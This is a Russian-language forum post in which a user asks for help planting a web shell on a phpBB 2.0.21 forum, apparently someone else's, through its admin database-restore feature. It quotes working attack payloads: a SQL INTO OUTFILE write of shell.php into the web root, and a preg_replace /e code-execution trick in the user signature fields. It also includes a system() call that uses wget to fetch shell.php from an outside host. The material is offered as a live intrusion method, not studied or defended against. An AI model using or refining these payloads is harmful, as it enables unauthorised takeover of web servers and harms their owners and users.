Пытаюсь загрузить шелл на форум через админку (форум phpbb 2.0.21).
Делаю это вот так:
Сообщение от
None
Создаем файл 1.sql суем в него код
SELECT '' FROM phpbb_users LIMIT 1 INTO OUTFILE '/home/lol/htdocs/forum/shell.php';
В админке востанавливаем через бд этот файл.
Восстанавливаю через бд этот файл и мне пишет:
Сообщение от
None
Can't create/write to file '/var/www/****/data/www/********.org/forum/shell.php' (Errcode: 13)
Это значит нет прав на запись ? (хотя если указать путь /tmp, то ошибок нет)
Пробывал вот таким вариантом:
Сообщение от
None
Создаем текстовый файл 1.sql суем в него код
Код:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb
hpinfo()' WHERE user_id=2;
ну вместо 2 ставим свой id
Заходим в админку, жмем востановление базы данных, выбираем файл 1.sql, и со звуком хлопец-хлопца-хоп-ца-ца
заходим в профайл а наблюдаем phpinfo()
Напоминаю, после ":" идет любой php код.
phpinfo() выводит, а вот как загрузить шелл ? Я пытался примерно так:
Сообщение от
None
UPDATE php2bb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:system("wget http://mysite.com/shell.php")' WHERE user_id=2;
. Но увы, так не работает (